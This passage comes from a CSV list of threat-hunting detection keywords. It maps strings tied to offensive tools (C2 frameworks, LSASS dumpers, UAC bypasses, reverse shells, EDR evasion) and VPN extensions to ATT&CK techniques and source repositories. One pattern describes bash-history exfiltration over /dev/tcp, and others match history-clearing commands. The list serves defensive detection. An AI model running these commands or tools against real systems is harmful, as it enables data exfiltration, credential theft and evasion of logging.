TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_core*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_ftp*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_shell*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*heroinn_util*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnApp*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnProtocol*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*HeroinnServerCommand*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*hfiref0x/UACME*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*hfiref0x/WDExtract*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,1,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*hhdobjgopfphlmjbmnpglhfcgppchgje*,greyware_tool_keyword,AdGuard VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Hibr2Dmp.exe*,offensive_tool_keyword,Hibr2Dmp,Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump),T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*Hidden.Desktop.mp4*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop 
session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop * *,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.x64.bin*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.x86.bin*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*HiddenDesktop.zip*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z
-*hide-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*HideProcess*,offensive_tool_keyword,HideProcess,process injection rootkit,T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/landhb/HideProcess,1,1,N/A,N/A,5,499,111,2019-03-26T03:35:57Z,2017-03-07T01:30:15Z
-*higioemojdadgdbhbbbkfbebbdlfjbip*,greyware_tool_keyword,Unlimited VPN & Proxy by ibVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*HIJACK_DLL_PATH*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential 
Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*hijack_hunter *,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,0,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*hijack_remote_thread*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*hijackablepath.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*hijackablepath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*hijackCLSIDpersistence.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z
-*hijackDll*WINMM.dll*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*Hijacker*,offensive_tool_keyword,Hijacker,Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. 
Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.,T1135 - T1175 - T1179 - T1189 - T1202,TA0002 - TA0007 - - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/chrisk44/Hijacker,1,0,N/A,N/A,10,2213,435,2020-08-26T19:01:31Z,2016-11-25T01:39:07Z
-*HijackHunter.csproj*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*HijackHunter.exe*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*hijackProgDirMissingDll*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*HInvokeHashGen.cs*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*hipncndjamdcmphkgngojegjblibadbe*,greyware_tool_keyword,RusVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*,greyware_tool_keyword,bash keylogger,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*history -c*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*history -d -2 && history -d 
-1*,greyware_tool_keyword,history,Removes the most recently logged command.,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*history_cmd,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*HiveJack-Console.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z 
-*hktalent/scan4all*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*HKTL*,signature_keyword,Antivirus Signature,Antivirus signature_keyword for hacktool,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A
-*HKTL_NETCAT*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*hlldz/dazzleUP*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z
-*hlldz/Phant0m*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z
-*hlldz/RefleXXion*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*hnmpcagpplmpfojmgmnngilcnanddlhb*,greyware_tool_keyword,Windscribe,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*hoangprod/AndrewSpecial*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z
-*hoapmlpnmpaehilehggglehfdlnoegck*,greyware_tool_keyword,Tunnello VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*hoaxshell.py*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z
-*holehe *@gmail.com*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z
-*holehe.core:main*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z
-*holehe\holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z
-*holehe-master.*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z
-*hollow *.exe *.bin*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,0,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*hollower.Hollow(*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*home/kali/Downloads*,offensive_tool_keyword,kali,Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Honey hash*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
